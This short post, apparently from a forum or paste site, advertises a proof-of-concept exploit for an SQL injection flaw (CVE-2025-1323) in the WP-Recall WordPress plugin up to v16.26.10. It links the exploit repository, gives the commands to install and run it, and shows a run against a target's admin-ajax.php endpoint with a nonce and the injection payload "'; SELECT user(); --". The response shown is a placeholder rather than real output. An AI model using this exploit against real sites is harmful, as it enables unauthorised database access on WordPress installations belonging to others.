Web CVE-2025-1323 WP-Recall plugin sqli

[Dwight149]

WP-Recall ≤ v16.26.10
poc: https://github.com/p33d/cve-2025-1323

pip install requests

python CVE-2025-1323.py

Enter target URL (e.g. https://target.com/wp-admin/admin-ajax.php): https://example.com/wp-admin/admin-ajax.php
Enter ajax_nonce value: 37c11b0c06

[*] Sending payload: '; SELECT user(); --

[+] Response received:
{"result":"SQL error or leaked data here..."}